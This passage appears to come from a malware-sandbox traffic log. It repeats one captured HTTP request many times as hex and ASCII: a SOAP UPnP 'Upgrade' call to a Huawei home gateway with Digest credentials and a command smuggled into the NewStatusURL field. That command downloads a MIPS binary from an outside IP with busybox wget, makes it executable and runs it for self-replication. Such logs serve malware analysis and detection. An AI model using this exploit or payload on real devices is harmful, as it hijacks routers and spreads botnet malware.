72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 